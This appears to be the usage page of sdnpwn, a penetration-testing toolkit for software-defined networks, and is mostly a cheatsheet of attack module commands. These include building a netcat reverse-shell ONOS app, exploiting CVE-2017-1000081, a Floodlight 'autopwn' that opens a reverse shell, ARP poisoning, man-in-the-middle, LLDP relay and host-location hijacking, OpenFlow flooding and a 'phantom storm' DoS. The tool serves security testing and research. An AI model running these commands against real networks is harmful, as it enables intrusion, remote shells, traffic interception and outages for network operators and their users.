Get sdnpwn

The latest version of sdnpwn can be found on GitHub.

Now available on BlackArch Linux!

Getting Started

Basic usage of sdnpwn is as follows:

./ <module name> <options>

An article introducing sdnpwn and its basic usage can be found here.

Module Cheatsheet

Functionality in sdnpwn is separated into different modules. Each module is responsible for a particular attack or action. See below for example usage of each module.


  • arpmon
    ./ arpmon -i eth0 -m watch #Dump information from ARP traffic seen at interface eth0 
    ./ arpmon -i eth0 -m map #Map MAC addresses to IP addresses
  • sdn-detect
    ./ sdn-detect #Test using default gateway with ARP traffic
    ./ sdn-detect -t -m icmp #Test using host using ICMP traffic
    ./ sdn-detect -c 100 -v #Test using 100 ARP messages. Print additional output.
  • controller-detect
    ./ controller-detect -i eth0 --lldp #Test using observed LLDP messages at interface eth0
    ./ controller-detect -t #Test northbound interface of controller at
  • of-scan
    ./ of-scan -t #Scan default ports 6633 and 6653 for OpenFlow service
    ./ of-scan -t -p 1000-10000 #Scan port range for OpenFlow service


  • help
    ./ help #Print sdnpwn help
  • mods
    ./ mods #Print a list of all executable modules
    ./ mods -s lfa #Search modules for a module with "lfa" in its name
    ./ mods -n new-mod #Create a new module named "new-mod"
    ./ mods -r new-mod #Remove module named "new-mod"
  • info
    ./ info test-mod #Print information for module named "test-mod"
  • system
    ./ system ifconfig #Run ifconfig command on the system


  • lfa-relay
    ./ lfa-relay --iface1 eth0 --iface2 eth1 --relay bridge #Relay LLDP frames between eth0 and eth1
    ./ lfa-relay --iface1 eth0 --iface2 eth1 --relay tunnel \
     --tunnel-local --tunnel-remote #Relay LLDP frames through a remote tunnel
  • lfa-scapy
    ./ lfa-scapy --iface1 eth0 --iface2 eth1 #Relay LLDP frames between eth0 and eth1
    ./ lfa-scapy --iface1 eth0 --iface2 eth1 --script #Pass relayed traffic through a custom script
  • lldp-replay
    ./ lldp-replay -i eth0 -w lldpcap.cap #Capture LLDP frame to file lldpcap.cap
    ./ lldp-replay -i eth0 -r lldpcap.cap #Replay LLDP frame from file lldpcap.cap
  • host-location-hijack
    ./ host-location-hijack --iface eth0 --target #Hijack location of
  • of-switch
    ./ of-switch -c -p 6653 --config confs/of-switch.conf #Connect to controller at on port 6653 using of-switch.conf configuration
    ./ of-switch -c -p 6653 --config confs/of-switch.conf -l 8888 #Open relay proxy on port 8888
    ./ of-switch -c -p 6653 --config confs/of-switch.conf -o eth0 #Output packet-out payloads to eth0
  • of-gen
    ./ of-gen -t -p 6633 --hello #Send OF Hello message to 
    ./ of-gen -t -p 6633 -c 1000 -d .001 --hello #Flood OF Hello messages 
    ./ of-gen -t -p 6633 --packet-in --xid 0 --buffer-id 0 --in-port 1 \
     --reason action --total-length 65353 --data-scapy "Ether()/IP()/TCP()" #Send arbitrary packet-in message
  • onos-app
    ./ onos-app -b apps/onos-nc-reverse-shell #Build netcat based reverse shell app from template
    ./ onos-app -b apps/onos-nc-reverse-shell -c #Modify configuration for app before build
    ./ onos-app -b apps/onos-nc-reverse-shell -k #Build app and keep source folder
  • onos-app-upload
    ./ onos-app-upload -t -p 8181 -a apps/compiled_apps/securearp.oar #Exploit CVE-2017-1000081 to upload app from compiled apps folder
  • floodlight-debug-autopwn
    ./ floodlight-debug-autopwn -t -l #Set up listener and get reverse shell on port 8888
    ./ floodlight-debug-autopwn -t -r #Do not set up a listener. Use this if you're using another program to listen for the shell
  • dp-arp-poison
    ./ dp-arp-poison -i eth0 -v -t -m de:ad:be:ef:ba:11 #Poison in ARP cache of with MAC of de:ad:be:ef:ba:11
  • dp-mitm
    ./ dp-mitm --iface eth0 --target1 --gateway #MITM connection from target to gateway
  • phantom-host-scan
    ./ phantom-host-scan --iface eth0 --target-ip --ports 22,23 --phantom-ip #Scan ports 22 and 23 using the phantom host scan
  • phantom-storm
    ./ phantom-storm --iface eth0 --target --phantom-ip --packets 1000 #Launch phantom storm DoS attack against network with 1000 packets